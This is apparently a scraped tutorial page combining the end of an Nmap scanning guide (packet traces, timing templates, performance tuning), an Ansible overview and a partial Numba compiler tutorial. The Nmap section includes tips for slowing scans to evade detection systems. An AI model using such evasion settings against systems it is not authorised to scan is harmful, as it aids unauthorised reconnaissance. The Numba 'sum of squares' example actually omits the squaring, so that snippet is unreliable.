(timeout: -1ms) EID                                                 50 NSOCK (0.0600s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]:                                                 =............221.244.207.74.in-addr.arpa..... NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.0600s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.0620s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.0620s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 66 NSOCK (0.0620s) nsi_delete() (IOD #1) NSOCK (0.0620s) msevent_cancel() on event #66 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #2) NSOCK (0.0620s) msevent_cancel() on event #34 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #3) NSOCK (0.0620s) msevent_cancel() on event #50 (type READ) SENT (0.0910s) TCP 106.187.53.215:46089 > 74.207.244.221:80 S ttl=42 id=23960 ip                                                 len=44 seq=1992555555 win=1024 <mss 1460> RCVD (0.1932s) TCP 74.207.244.221:80 > 106.187.53.215:46089 SA ttl=56 id=0 iplen                                                =44 seq=4229796359 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds Port scanning: In this phase, Nmap determines the state of the ports. By default, it uses SYN/TCP Connect scanning depending on the user privileges, but several other port scanning techniques are supported. Although this may not be so obvious, Nmap can do a few different things with targets without port scanning them like resolving their DNS names or checking whether they are online. For this reason, this phase can be skipped with the argument -sn: $ nmap -sn -R --packet-trace 74.207.244.221 SENT (0.0363s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=56 id=36390 iplen=28 SENT (0.0364s) TCP 106.187.53.215:53376 > 74.207.244.221:443 S ttl=39 id=22228 iplen=44 seq=155734416 win=1024 <mss 1460> SENT (0.0365s) TCP 106.187.53.215:53376 > 74.207.244.221:80 A ttl=46 id=36835 iplen=40 seq=0 win=1024 SENT (0.0366s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=50 id=2630 iplen=40 RCVD (0.1377s) TCP 74.207.244.221:443 > 106.187.53.215:53376 RA ttl=56 id=0 iplen=40 seq=0 win=0 NSOCK (0.1660s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18 NSOCK (0.1660s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.1660s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34 NSOCK (0.1660s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.1660s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50 NSOCK (0.1660s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: [............221.244.207.74.in-addr.arpa..... NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.1660s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.1660s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66 NSOCK (0.1660s) nsi_delete() (IOD #1) NSOCK (0.1660s) msevent_cancel() on event #66 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #2) NSOCK (0.1660s) msevent_cancel() on event #34 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #3) NSOCK (0.1660s) msevent_cancel() on event #50 (type READ) Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds In the previous example, we can see that an ICMP echo request and a reverse DNS lookup were performed (We forced DNS lookups with the option -R), but no port scanning was done. There's more... I recommend that you also run a couple of test scans to measure the speeds of the different DNS servers. I've found that ISPs tend to have the slowest DNS servers, but you can make Nmap use different DNS servers by specifying the argument --dns-servers. For example, to use Google's DNS servers, use the following command: # nmap -R --dns-servers 8.8.8.8,8.8.4.4 -O scanme.nmap.org You can test your DNS server speed by comparing the scan times. The following command tells Nmap not to ping or scan the port and only perform a reverse DNS lookup: $ nmap -R -Pn -sn 74.207.244.221 Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Selecting the correct timing template Nmap includes six templates that set different timing and performance arguments to optimize your scans based on network condition. Even though Nmap automatically adjusts some of these values, it is recommended that you set the correct timing template to hint Nmap about the speed of your network connection and the target's response time. The following will teach you about Nmap's timing templates and how to choose the more appropriate one. How to do it... Open your terminal and type the following command to use the aggressive timing template (-T4). Let's also use debugging (-d) to see what Nmap option -T4 sets: # nmap -T4 -d 192.168.4.20 --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- <Scan output removed for clarity> You may use the integers between 0 and 5, for example,-T[0-5]. How it works... The option -T is used to set the timing template in Nmap. Nmap provides six timing templates to help users tune the timing and performance arguments. The available timing templates and their initial configuration values are as follows: Paranoid(-0)—This template is useful to avoid detection systems, but it is painfully slow because only one port is scanned at a time, and the timeout between probes is 5 minutes: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 300000, min 100, max 300000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Sneaky (-1)—This template is useful for avoiding detection systems but is still very slow: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 15000, min 100, max 15000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Polite (-2)—This template is used when scanning is not supposed to interfere with the target system, very conservative and safe setting: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Normal (-3)—This is Nmap's default timing template, which is used when the argument -T is not set: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Aggressive (-4)—This is the recommended timing template for broadband and Ethernet connections: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Insane (-5)—This timing template sacrifices accuracy for speed: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 250, min 50, max 300 max-scan-delay: TCP 5, UDP 1000, SCTP 5 parallelism: min 0, max 0 max-retries: 2, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- There's more... An interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list; so far, this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values(--max-rateand --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. Adjusting timing parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it can be fine-tuned using timing options to improve performance. Nmap automatically calculates packet round trip, timeout, and delay values, but these values can also be set manually through specific settings. The following describes the timing parameters supported by Nmap. How to do it... Enter the following command to adjust the initial round trip timeout, the delay between probes and a time out for each scanned host: # nmap -T4 --scan-delay 1s --initial-rtt-timeout 150ms --host-timeout 15m -d scanme.nmap.org --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 150, min 100, max 1250 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 6, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- How it works... Nmap supports different timing arguments that can be customized. However, setting these values incorrectly will most likely hurt performance rather than improve it. Let's examine closer each timing parameter and learn its Nmap option parameter name. The Round Trip Time (RTT) value is used by Nmap to know when to give up or retransmit a probe response. Nmap estimates this value by analyzing previous responses, but you can set the initial RTT timeout with the argument --initial-rtt-timeout, as shown in the following command: # nmap -A -p- --initial-rtt-timeout 150ms <target> In addition, you can set the minimum and maximum RTT timeout values with--min-rtt-timeout and --max-rtt-timeout, respectively, as shown in the following command: # nmap -A -p- --min-rtt-timeout 200ms --max-rtt-timeout 600ms <target> Another very important setting we can control in Nmap is the waiting time between probes. Use the arguments --scan-delay and --max-scan-delay to set the waiting time and maximum amount of time allowed to wait between probes, respectively, as shown in the following commands: # nmap -A --max-scan-delay 10s scanme.nmap.org # nmap -A --scan-delay 1s scanme.nmap.org Note that the arguments previously shown are very useful when avoiding detection mechanisms. Be careful not to set --max-scan-delay too low because it will most likely miss the ports that are open. There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout: # nmap -sV -A -p- --host-timeout 5m <target> Estimating round trip times with Nping To use Nping to estimate the round trip time taken between the target and you, the following command can be used: # nping -c30 <target> This will make Nping send 30 ICMP echo request packets, and after it finishes, it will show the average, minimum, and maximum RTT values obtained: # nping -c30 scanme.nmap.org ... SENT (29.3569s) ICMP 50.116.1.121 > 74.207.244.221 Echo request (type=8/code=0) ttl=64 id=27550 iplen=28 RCVD (29.3576s) ICMP 74.207.244.221 > 50.116.1.121 Echo reply (type=0/code=0) ttl=63 id=7572 iplen=28 Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms Raw packets sent: 30 (840B) | Rcvd: 30 (840B) | Lost: 0 (0.00%) Tx time: 29.09096s | Tx bytes/s: 28.87 | Tx pkts/s: 1.03 Rx time: 30.09258s | Rx bytes/s: 27.91 | Rx pkts/s: 1.00 Nping done: 1 IP address pinged in 30.47 seconds Examine the round trip times and use the maximum to set the correct --initial-rtt-timeout and --max-rtt-timeout values. The official documentation recommends using double the maximum RTT value for the --initial-rtt-timeout, and as high as four times the maximum round time value for the –max-rtt-timeout. Displaying the timing settings Enable debugging to make Nmap inform you about the timing settings before scanning: $ nmap -d<target> --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Adjusting performance parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it also supports several parameters that affect the behavior of Nmap, such as the number of hosts scanned concurrently, number of retries, and number of allowed probes. Learning how to adjust these parameters properly can reduce a lot of your scanning time. The following explains the Nmap parameters that can be adjusted to improve performance. How to do it... Enter the following command, adjusting the values for your target condition: $ nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target> How it works... The command shown previously tells Nmap to scan and report by grouping no less than 100 (--min-hostgroup 100) and no more than 500 hosts (--max-hostgroup 500). It also tells Nmap to retry only twice before giving up on any port (--max-retries 2): # nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target> It is important to note that setting these values incorrectly will most likely hurt the performance or accuracy rather than improve it. Nmap sends many probes during its port scanning phase due to the ambiguity of what a lack of responsemeans; either the packet got lost, the service is filtered, or the service is not open. By default, Nmap adjusts the number of retries based on the network conditions, but you can set this value with the argument --max-retries. By increasing the number of retries, we can improve Nmap's accuracy, but keep in mind this sacrifices speed: $ nmap --max-retries 10<target> The arguments --min-hostgroup and --max-hostgroup control the number of hosts that we probe concurrently. Keep in mind that reports are also generated based on this value, so adjust it depending on how often would you like to see the scan results. Larger groups are optimalto improve performance, but you may prefer smaller host groups on slow networks: # nmap -A -p- --min-hostgroup 100 --max-hostgroup 500 <target> There is also a very important argument that can be used to limit the number of packets sent per second by Nmap. The arguments --min-rate and --max-rate need to be used carefully to avoid undesirable effects. These rates are set automatically by Nmap if the arguments are not present: # nmap -A -p- --min-rate 50 --max-rate 100 <target> Finally, the arguments --min-parallelism and --max-parallelism can be used to control the number of probes for a host group. By setting these arguments, Nmap will no longer adjust the values dynamically: # nmap -A --max-parallelism 1 <target> # nmap -A --min-parallelism 10 --max-parallelism 250 <target> There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout, as shown in the following command: # nmap -sV -A -p- --host-timeout 5m <target> Interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list, so far this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Summary In this article, we are finally able to learn how to implement and optimize scans. Nmap scans among several clients, allowing us to save time and take advantage of extra bandwidth and CPU resources. This article is short but full of tips for optimizing your scans. Prepare to dig deep into Nmap's internals and the timing and performance parameters! Resources for Article: Further resources on this subject: Introduction to Network Security Implementing OpenStack Networking and Security Communication and Network Security
Read more
  • 0
  • 0
  • 37401

article-image-getting-started-ansible-2
Packt
23 Jun 2017
5 min read
Save for later

Getting Started with Ansible 2

Packt
23 Jun 2017
5 min read
In this article, by Jonathan McAllister, author of the book, Implementing DevOps with Ansible 2, we will learn what is Ansible, how users can leverage it, it's architecture, the key differentiators of Ansible from other configuration managements. We will also see the organizations that were successfully able to leverage Ansible. (For more resources related to this topic, see here.) What is Ansible? Ansible is a relatively new addition to the DevOps and configuration management space. It's simplicity, structured automation format and development paradigm have caught the eyes of both small and large corporations alike. Organizations as large as Twitter have managed successfully to leverage Ansible for highly scaled deployments and configuration management across implementations across thousands of servers simultaneously. And Twitter isn't the only organization that has managed to implement Ansible at scale, other well-known organizations that have successfully leveraged Ansible include Logitech, NASA, NEC, Twitter, Microsoft and hundreds more. As it stands today, Ansible is in use by major players around the world managing thousands of deployments and configuration management solutions world wide. The Ansible's Automation Architecture Ansible was created with an incredibly flexible and scalable automation engine. It allows users to leverage it in many diverse ways and can be conformed to be used in the way that best suits your specific needs. Since Ansible is agentless (meaning there is no permanently running daemon on the systems it manages or executes from), it can be used locally to control a single system (without any network connectivity), or leveraged to orchestrate and execute automation against many systems, via a control server. In addition to the aforementioned named architectures, Ansible can also be leveraged via Vagrant or Docker to provision infrastructure automatically. This type of solution basically allows the Ansible user to bootstrap their hardware or infrastructure provisioning by running an Ansible playbook(s).  If you happen to be a Vagrant user, there is instructions within the HashiCorp Ansible provisioning located at https://www.vagrantup.com/docs/provisioning/ansible.html. Ansible is open source, module based, pluggable, and agentless. These key differentiators from other configuration management solutions give Ansible a significant edge. Let's take a look at each of these differentiators in details and see what that actually means for Ansible developers and users: Open source: It is no secret that successful open source solutions are usually extraordinarily feature rich. This is because instead of a simple 8 person (or even 100) person engineering team, there are potentially thousands of developers. Each development and enhancement has been designed to fit a unique need. As a result the end deliverable product provides the consumers of Ansible with a very well rounded solution that can be adapted or leveraged in numerous ways. Module based: Ansible has been developed with the intention to integrate with numerous other open and closed source software solutions. This idea means that Ansible is currently compatible with multiple flavors of Linux, Windows and Cloud providers. Aside from its OS level support Ansible currently integrates with hundreds of other software solutions; including EC2, Jira, Jenkins, Bamboo, Microsoft Azure, Digital Ocean, Docker, Google and MANY MANY more.   For a complete list of Ansible modules, please consult the Ansible official module support list located at http://docs.ansible.com/ansible/modules_by_category.html. Agentless: One of the key differentiators that gives Ansible an edge against the competition is the fact that it is 100% agentless. This means there are no daemons that need to be installed on remote machines, no firewall ports that need to be opened (besides traditional SSH), no monitoring that needs to be performed on the remote machines and no management that needs to be performed on the infrastructure fleet. In effect, this makes Ansible very self sufficient.  Since Ansible can be implemented in a few different ways the aim of this section is to highlight these options and help get us familiar with the architecture types that Ansible supports. Generally the architecture of Ansible can be categorized into three distinct architecture types. These are described next. Pluggable: While Ansible comes out of the box with a wide spectrum of software integrations support, it is often times a requirement to integrate the solution with a company based internal software solution or a software solution that has not already been integrated into Ansible's robust playbook suite. The answer to such a requirement would be to create a plugin based solution for Ansible, this providing the custom functionality necessary.  Summary In this article, we discussed the architecture of Ansible, the key differentiators that differentiate Ansible from other configuration management. We learnt that Ansible can also be leveraged via Vagrant or Docker to provision infrastructure automatically. We also saw that Ansible has been successfully leveraged by large oraganizations like Twitter, Microsoft, and many more. Resources for Article: Further resources on this subject: Getting Started with Ansible Getting Started with Ansible Introduction to Ansible Introduction to Ansible System Architecture and Design of Ansible System Architecture and Design of Ansible
Read more
  • 0
  • 0
  • 25509

article-image-exploring-compilers
Packt
23 Jun 2017
17 min read
Save for later

Exploring Compilers

Packt
23 Jun 2017
17 min read
In this article by Gabriele Lanaro, author of the book, Python High Performance - Second Edition, we will see that Python is a mature and widely used language and there is a large interest in improving its performance by compiling functions and methods directly to machine code rather than executing instructions in the interpreter. In this article, we will explore two projects--Numba and PyPy--that approach compilation in a slightly different way. Numba is a library designed to compile small functions on the fly. Instead of transforming Python code to C, Numba analyzes and compiles Python functions directly to machine code. PyPy is a replacement interpreter that works by analyzing the code at runtime and optimizing the slow loops automatically. (For more resources related to this topic, see here.) Numba Numba was started in 2012 by Travis Oliphant, the original author of NumPy, as a library for compiling individual Python functions at runtime using the Low-Level Virtual Machine  ( LLVM ) toolchain. LLVM is a set of tools designed to write compilers. LLVM is language agnostic and is used to write compilers for a wide range of languages (an important example is the clang compiler). One of the core aspects of LLVM is the intermediate representation (the LLVM IR), a very low-level platform-agnostic language similar to assembly, that can be compiled to machine code for the specific target platform. Numba works by inspecting Python functions and by compiling them, using LLVM, to the IR. As we have already seen in the last article, the speed gains can be obtained when we introduce types for variables and functions. Numba implements clever algorithms to guess the types (this is called type inference) and compiles type-aware versions of the functions for fast execution. Note that Numba was developed to improve the performance of numerical code. The development efforts often prioritize the optimization of applications that intensively use NumPy arrays. Numba is evolving really fast and can have substantial improvements between releases and, sometimes, backward incompatible changes.  To keep up, ensure that you refer to the release notes for each version. In the rest of this article, we will use Numba version 0.30.1; ensure that you install the correct version to avoid any error. The complete code examples in this article can be found in the Numba.ipynb notebook. First steps with Numba Getting started with Numba is fairly straightforward. As a first example, we will implement a function that calculates the sum of squares of an array. The function definition is as follows: def sum_sq(a): result = 0 N = len(a) for i in range(N): result += a[i] return result To set up this function with Numba, it is sufficient to apply the nb.jit decorator: from numba import nb @nb.jit def sum_sq(a): ... The nb.jit decorator won't do much when applied. However, when the function will be invoked for the first time, Numba will detect the type of the input argument, a , and compile a specialized, performant version of the original function. To measure the performance gain obtained by the Numba compiler, we can compare the timings of the original and the specialized functions. The original, undecorated function can be easily accessed through the py_func attribute. The timings for the two functions are as follows: import numpy as np x = np.random.rand(10000) # Original %timeit sum_sq.py_func(x) 100 loops, best of 3: 6.11 ms per loop # Numba %timeit sum_sq(x) 100000 loops, best of 3: 11.7 µs per loop You can see how the Numba version is order of magnitude faster than the Python version. We can also compare how this implementation stacks up against NumPy standard operators: %timeit (x**2).sum() 10000 loops, best of 3: 14.8 µs per loop In this case, the Numba compiled function is marginally faster than NumPy vectorized operations. The reason for the extra speed of the Numba version is likely that the NumPy version allocates an extra array before performing the sum in comparison with the in-place operations performed by our sum_sq function. As we didn't use array-specific methods in sum_sq, we can also try to apply the same function on a regular Python list of floating point numbers. Interestingly, Numba is able to obtain a substantial speed up even in this case, as compared to a list comprehension: x_list = x.tolist() %timeit sum_sq(x_list) 1000 loops, best of 3: 199 µs per loop %timeit sum([x**2 for x in x_list]) 1000 loops, best of 3: 1.28 ms per loop Considering that all we needed to do was apply a simple decorator to obtain an incredible speed up over different data types, it's no wonder that what Numba does looks like magic. In the following sections, we will dig deeper and understand how Numba works and evaluate the benefits and limitations of the Numba compiler. Type specializations As shown earlier, the nb.jit decorator works by compiling a specialized version of the function once it encounters a new argument type. To better understand how this works, we can inspect the decorated function in the sum_sq example. Numba exposes the specialized types using the signatures attribute. Right after the sum_sq definition, we can inspect the available specialization by accessing the sum_sq.signatures, as follows: sum_sq.signatures # Output: # [] If we call this function with a specific argument, for instance, an array of float64 numbers, we can see how Numba compiles a specialized version on the fly. If we also apply the function on an array of float32, we can see how a new entry is added to the sum_sq.signatures list: x = np.random.rand(1000).astype('float64') sum_sq(x) sum_sq.signatures # Result: # [(array(float64, 1d, C),)] x = np.random.rand(1000).astype('float32') sum_sq(x) sum_sq.signatures # Result: # [(array(float64, 1d, C),), (array(float32, 1d, C),)] It is possible to explicitly compile the function for certain types by passing a signature to the nb.jit function. An individual signature can be passed as a tuple that contains the type we would like to accept. Numba provides a great variety of types that can be found in the nb.types module, and they are also available in the top-level nb namespace. If we want to specify an array of a specific type, we can use the slicing operator, [:], on the type itself. In the following example, we demonstrate how to declare a function that takes an array of float64 as its only argument: @nb.jit((nb.float64[:],)) def sum_sq(a): Note that when we explicitly declare a signature, we are prevented from using other types, as demonstrated in the following example. If we try to pass an array, x, as float32, Numba will raise a TypeError: sum_sq(x.astype('float32')) # TypeError: No matching definition for argument type(s) array(float32, 1d, C) Another way to declare signatures is through type strings. For example, a function that takes a float64 as input and returns a float64 as output can be declared with the float64(float64) string. Array types can be declared using a [:] suffix. To put this together, we can declare a signature for our sum_sq function, as follows: @nb.jit("float64(float64[:])") def sum_sq(a): You can also pass multiple signatures by passing a list: @nb.jit(["float64(float64[:])", "float64(float32[:])"]) def sum_sq(a): Object mode versus native mode So far, we have shown how Numba behaves when handling a fairly simple function. In this case, Numba worked exceptionally well, and we obtained great performance on arrays and lists.The degree of optimization obtainable from Numba depends on how well Numba is able to infer the variable types and how well it can translate those standard Python operations to fast type-specific versions. If this happens, the interpreter is side-stepped and we can get performance gains similar to those of Cython. When Numba cannot infer variable types, it will still try and compile the code, reverting to the interpreter when the types can't be determined or when certain operations are unsupported. In Numba, this is called object mode and is in contrast to the intepreter-free scenario, called native mode. Numba provides a function, called inspect_types, that helps understand how effective the type inference was and which operations were optimized. As an example, we can take a look at the types inferred for our sum_sq function: sum_sq.inspect_types() When this function is called, Numba will print the type inferred for each specialized version of the function. The output consists of blocks that contain information about variables and types associated with them. For example, we can examine the N = len(a) line: # --- LINE 4 --- # a = arg(0, name=a) :: array(float64, 1d, A) # $0.1 = global(len: <built-in function len>) :: Function(<built-in function len>) # $0.3 = call $0.1(a) :: (array(float64, 1d, A),) -> int64 # N = $0.3 :: int64 N = len(a) For each line, Numba prints a thorough description of variables, functions, and intermediate results. In the preceding example, you can see (second line) that the argument a is correctly identified as an array of float64 numbers. At LINE 4, the input and return type of the len function is also correctly identified (and likely optimized) as taking an array of float64 numbers and returning an int64. If you scroll through the output, you can see how all the variables have a well-defined type. Therefore, we can be certain that Numba is able to compile the code quite efficiently. This form of compilation is called native mode. As a counter example, we can see what happens if we write a function with unsupported operations. For example, as of version 0.30.1, Numba has limited support for string operations. We can implement a function that concatenates a series of strings, and compiles it as follows: @nb.jit def concatenate(strings): result = '' for s in strings: result += s return result Now, we can invoke this function with a list of strings and inspect the types: concatenate(['hello', 'world']) concatenate.signatures # Output: [(reflected list(str),)] concatenate.inspect_types() Numba will return the output of the function for the reflected list (str) type. We can, for instance, examine how line 3 gets inferred. The output of concatenate.inspect_types() is reproduced here: # --- LINE 3 --- # strings = arg(0, name=strings) :: pyobject # $const0.1 = const(str, ) :: pyobject # result = $const0.1 :: pyobject # jump 6 # label 6 result = '' You can see how this time, each variable or function is of the generic pyobject type rather than a specific one. This means that, in this case, Numba is unable to compile this operation without the help of the Python interpreter. Most importantly, if we time the original and compiled function, we note that the compiled function is about three times slower than the pure Python counterpart: x = ['hello'] * 1000 %timeit concatenate.py_func(x) 10000 loops, best of 3: 111 µs per loop %timeit concatenate(x) 1000 loops, best of 3: 317 µs per loop This is because the Numba compiler is not able to optimize the code and adds some extra overhead to the function call.As you may have noted, Numba compiled the code without complaints even if it is inefficient. The main reason for this is that Numba can still compile other sections of the code in an efficient manner while falling back to the Python interpreter for other parts of the code. This compilation strategy is called object mode. It is possible to force the use of native mode by passing the nopython=True option to the nb.jit decorator. If, for example, we apply this decorator to our concatenate function, we observe that Numba throws an error on first invocation: @nb.jit(nopython=True) def concatenate(strings): result = '' for s in strings: result += s return result concatenate(x) # Exception: # TypingError: Failed at nopython (nopython frontend) This feature is quite useful for debugging and ensuring that all the code is fast and correctly typed. Numba and NumPy Numba was originally developed to easily increase performance of code that uses NumPy arrays. Currently, many NumPy features are implemented efficiently by the compiler. Universal functions with Numba Universal functions are special functions defined in NumPy that are able to operate on arrays of different sizes and shapes according to the broadcasting rules. One of the best features of Numba is the implementation of fast ufuncs. We have already seen some ufunc examples in article 3, Fast Array Operations with NumPy and Pandas. For instance, the np.log function is a ufunc because it can accept scalars and arrays of different sizes and shapes. Also, universal functions that take multiple arguments still work according to the  broadcasting rules. Examples of universal functions that take multiple arguments are np.sum or np.difference. Universal functions can be defined in standard NumPy by implementing the scalar version and using the np.vectorize function to enhance the function with the broadcasting feature. As an example, we will see how to write the Cantor pairing function. A pairing function is a function that encodes two natural numbers into a single natural number so that you can easily interconvert between the two representations. The Cantor pairing function can be written as follows: import numpy as np def cantor(a, b): return int(0.5 * (a + b)*(a + b + 1) + b) As already mentioned, it is possible to create a ufunc in pure Python using the np.vectorized decorator: @np.vectorize def cantor(a, b): return int(0.5 * (a + b)*(a + b + 1) + b) cantor(np.array([1, 2]), 2) # Result: # array([ 8, 12]) Except for the convenience, defining universal functions in pure Python is not very useful as it requires a lot of function calls affected by interpreter overhead. For this reason, ufunc implementation is usually done in C or Cython, but Numba beats all these methods by its convenience. All that is needed to do in order to perform the conversion is using the equivalent decorator, nb.vectorize. We can compare the speed of the standard np.vectorized version which, in the following code, is called cantor_py, and the same function is implemented using standard NumPy operations: # Pure Python %timeit cantor_py(x1, x2) 100 loops, best of 3: 6.06 ms per loop # Numba %timeit cantor(x1, x2) 100000 loops, best of 3: 15 µs per loop # NumPy %timeit (0.5 * (x1 + x2)*(x1 + x2 + 1) + x2).astype(int) 10000 loops, best of 3: 57.1 µs per loop You can see how the Numba version beats all the other options by a large margin! Numba works extremely well because the function is simple and type inference is possible. An additional advantage of universal functions is that, since they depend on individual values, their evaluation can also be executed in parallel. Numba provides an easy way to parallelize such functions by passing the target="cpu" or target="gpu" keyword argument to the nb.vectorize decorator. Generalized universal functions One of the main limitations of universal functions is that they must be defined on scalar values. A generalized universal function, abbreviated gufunc, is an extension of universal functions to procedures that take arrays. A classic example is the matrix multiplication. In NumPy, matrix multiplication can be applied using the np.matmul function, which takes two 2D arrays and returns another 2D array. An example usage of np.matmul is as follows: a = np.random.rand(3, 3) b = np.random.rand(3, 3) c = np.matmul(a, b) c.shape # Result: # (3, 3) As we saw in the previous subsection, a ufunc broadcasts the operation over arrays of scalars, its natural generalization will be to broadcast over an array of arrays. If, for instance, we take two arrays of 3 by 3 matrices, we will expect np.matmul to take to match the matrices and take their product. In the following example, we take two arrays containing 10 matrices of shape (3, 3). If we apply np.matmul, the product will be applied matrix-wise to obtain a new array containing the 10 results (which are, again, (3, 3) matrices): a = np.random.rand(10, 3, 3) b = np.random.rand(10, 3, 3) c = np.matmul(a, b) c.shape # Output # (10, 3, 3) The usual rules for broadcasting will work in a similar way. For example, if we have an array of (3, 3) matrices, which will have a shape of (10, 3, 3), we can use np.matmul to calculate the matrix multiplication of each element with a single (3, 3) matrix. According to the broadcasting rules, we obtain that the single matrix will be repeated to obtain a size of (10, 3, 3): a = np.random.rand(10, 3, 3) b = np.random.rand(3, 3) # Broadcasted to shape (10, 3, 3) c = np.matmul(a, b) c.shape # Result: # (10, 3, 3) Numba supports the implementation of efficient generalized universal functions through the nb.guvectorize decorator. As an example, we will implement a function that computes the euclidean distance between two arrays as a gufunc. To create a gufunc, we have to define a function that takes the input arrays, plus an output array where we will store the result of our calculation. The nb.guvectorize decorator requires two arguments: The types of the input and output: two 1D arrays as input and a scalar as output The so called layout string, which is a representation of the input and output sizes; in our case, we take two arrays of the same size (denoted arbitrarily by n), and we output a scalar In the following example, we show the implementation of the euclidean function using the nb.guvectorize decorator: @nb.guvectorize(['float64[:], float64[:], float64[:]'], '(n), (n) - > ()') def euclidean(a, b, out): N = a.shape[0] out[0] = 0.0 for i in range(N): out[0] += (a[i] - b[i])**2 There are a few very important points to be made. Predictably, we declared the types of the inputs a and b as float64[:], because they are 1D arrays. However, what about the output argument? Wasn't it supposed to be a scalar? Yes, however, Numba treats scalar argument as arrays of size 1. That's why it was declared as float64[:]. Similarly, the layout string indicates that we have two arrays of size (n) and the output is a scalar, denoted by empty brackets--(). However, the array out will be passed as an array of size 1. Also, note that we don't return anything from the function; all the output has to be written in the out array. The letter n in 